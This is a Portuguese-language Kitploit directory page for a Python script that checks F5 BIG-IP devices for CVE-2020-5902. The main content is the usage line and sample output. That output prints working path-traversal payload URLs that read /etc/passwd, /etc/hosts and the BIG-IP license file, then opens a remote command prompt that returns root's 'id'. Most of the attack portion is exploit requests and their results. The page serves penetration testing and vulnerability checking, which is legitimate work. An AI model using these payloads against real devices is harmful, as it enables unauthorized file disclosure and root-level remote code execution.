Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-5902 — Script Python para verificar CVE-2020-5902 (dispositivos F5 BIG-IP). | Kitploit
Ferramentas/GitHubGitHub/0xabdullah/cve-2020-5902
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoFerramenta de Acesso Remoto
GitHub0xabdullah/cve-2020-5902

CVE-2020-5902

Script Python para verificar CVE-2020-5902 (dispositivos F5 BIG-IP).

Ver Repositório
1há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-5902

Script Python para verificar o CVE-2020-5902 (dispositivos F5 BIG-IP).

Uso

root@kitploit:~
python3 CVE-2020-5902.py -i <IP>

Saída

root@kitploit:~
- Python script to check CVE-2020-5902 (F5 BIG-IP devices). | coded by Abdullah AlZahrani
[!] Your target: 127.0.0.1
[I] /etc/passwd readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

[I] /etc/hosts readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

[I] /config/bigip.license readable
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

[I] The target is vulnerable to CVE-2020-5902
[*] Check if the target vulnerable to RCE
[#] The target is vulnerable to RCE, let's GO.
Command > id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Baixar ferramenta